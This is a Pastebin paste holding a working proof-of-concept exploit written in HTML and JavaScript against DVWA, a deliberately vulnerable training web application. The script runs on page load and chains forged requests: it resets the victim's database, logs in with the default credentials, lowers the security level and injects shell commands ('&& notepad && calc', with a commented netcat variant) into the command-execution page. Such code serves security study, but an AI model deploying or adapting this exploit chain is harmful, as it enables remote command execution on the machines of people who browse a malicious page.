Guest User

DVWA Command Execution Via CSRF Exploit

a guest
Sep 5th, 2014
788
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to
  2.     first reset the DVWA database of victim, then make the victim log in using the default resets,
  3.     next crafts another CSRF to change the challenge level to low to make exploitation more probable,
  4.     then use these to craft a command execution CSRF and possibly get a shell. :)
  5.    
  6.     *This PoC will open calculator as a demo execution in approximately 5 seconds.*
  7.    
  8.     The attacker just needs to know you have DVWA for this to work.
  9.    
  10.     Paulos Yibelo and Tabor N. Shiferaw  2014
  11.    
  12.     -->
  13.    
  14.     <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
  15.     </script>
  16.     <div id='loader'></div>
  17.    
  18.     <Script>
  19.  
  20.     //document.getElementById("loader").innerHTML = 'Loading...';
  21.    
  22.     var one = {"create_db":'whatever'};
  23.     var two = {"username":"admin","password":"password","Login":"Login"};
  24.     var three = {"security":"low","seclev_submit":"Submit"};
  25.    
  26.     //windows opens calculator; change this to whatever your desire
  27.     var four = {"ip":"127.0.0.1 && notepad && calc","submit":"submit"};
  28.    
  29.     //linux
  30.     //var four = {"ip":"127.0.0.1;netcat -l 15.11.11.x -p 4444","submit":"submit"};
  31.    
  32.     /*
  33.     *step 1
  34.     *Reset the Databse
  35.     */
  36.     function start_exploit()
  37.     {
  38.         $("#loader").html("Loading...");
  39.         $.ajax({
  40.             url:"http://localhost/dvwa/setup.php",
  41.             type:"POST",
  42.             data:one,
  43.             success:
  44.                     function(x){
  45.                         dvwaLogin();
  46.                     }
  47.            
  48.         });
  49.     }
  50.     /*
  51.     *step 2
  52.     *login using default new password
  53.     */
  54.     function dvwaLogin()
  55.     {
  56.         $.ajax({
  57.             url:"http://localhost/dvwa/login.php",
  58.             type:"POST",
  59.             data:two,
  60.             success:function(x){
  61.                 levelChanger();
  62.             }
  63.         });
  64.     }
  65.     /*
  66.     *step 3
  67.     *set level to low
  68.     */
  69.     function levelChanger(){
  70.         $.ajax({
  71.             url:"http://localhost/dvwa/security.php",
  72.             type:"POST",
  73.             data:three,
  74.             success:function(x){
  75.                 commandExecution();
  76.             }
  77.         });
  78.     }
  79.    
  80.     /*
  81.     *step 4
  82.     *execute command
  83.     */
  84.     function commandExecution(){
  85.         $.ajax(
  86.                 {
  87.                     url:"http://localhost/dvwa/vulnerabilities/exec/index.php",
  88.                     type:"POST",
  89.                     data:four,
  90.                     success:function(x){
  91.                         //document.getElementById("loader").innerHTML = "Executed";
  92.                         $("#loader").text("Loaded");
  93.                     }
  94.                 }
  95.             );
  96.     }
  97.    
  98.    
  99.     start_exploit();
  100.     </script>
  101.    
  102. <!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×